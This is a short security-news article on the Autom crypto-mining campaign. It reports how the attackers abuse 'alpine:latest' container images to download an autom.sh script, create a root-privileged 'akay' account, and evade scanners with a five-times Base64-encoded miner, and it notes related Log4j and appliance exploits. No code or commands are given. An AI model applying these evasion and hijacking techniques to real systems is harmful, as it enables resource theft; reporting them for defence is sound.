Autom Malware

Autom is the name of an ongoing crypto-mining campaign, first detected back in 2019. Since then, a total of 84 attacks against researchers’ honeypot servers have been reported, four of these occurring in 2021. These crypto-mining attacks are not expected to slow down in the coming year. In fact, it is rather the opposite. Experts report that the attackers behind the Autom campaign are evolving their methods, making malware threats more capable of evading defense mechanisms and flying under the radar of anti-virus scanning tools.

Initial attacks of this campaign involved executing a threatening command, once a user runs a vanilla image with the name "alpine:latest." That action resulted in a shell script named "autom.sh." being downloaded on the device. This tactic keeps being successful, as most organizations trust official vanilla images and allow their use. While the threatening command added to the corrupted vanilla image has barely been changed over time, malware researchers have identified a difference in the server from which the shell script is being downloaded.

According to reports, the attack sequence still consists of the autom.sh script, which enables the creation of a new user account named “akay.” Then, the account’s privileges are upgraded to a root user, allowing the attackers to run arbitrary commands on the infected machine and, eventually, exploit the available resources to mine crypto-currency.

A new feature added recently concerns the ability to remain invisible to detection – the threatening scripts can now disable security mechanisms by retrieving an obfuscated mining shell script. This particular script avoids security tools, as it is Base64-encoded five times.

Along with the already known vulnerabilities that cybercriminals usually exploit for conducting crypto-mining attacks, in recent weeks, security flaws in the Log4j logging library have been abused to execute a scheme called crypto-jacking, which also involves hijacking machines with the purpose of mining crypto-currencies. Additionally, some newly discovered vulnerabilities in Atlassian Confluence, F5 BIG-IP, Oracle WebLogic Servers, and VMware vCenter have been misused. At the same time, the network-attached storage (NAS) appliance maker QNAP also has announced recently the discovery of a cryptocurrency mining malware that could occupy around 50% of the total CPU usage.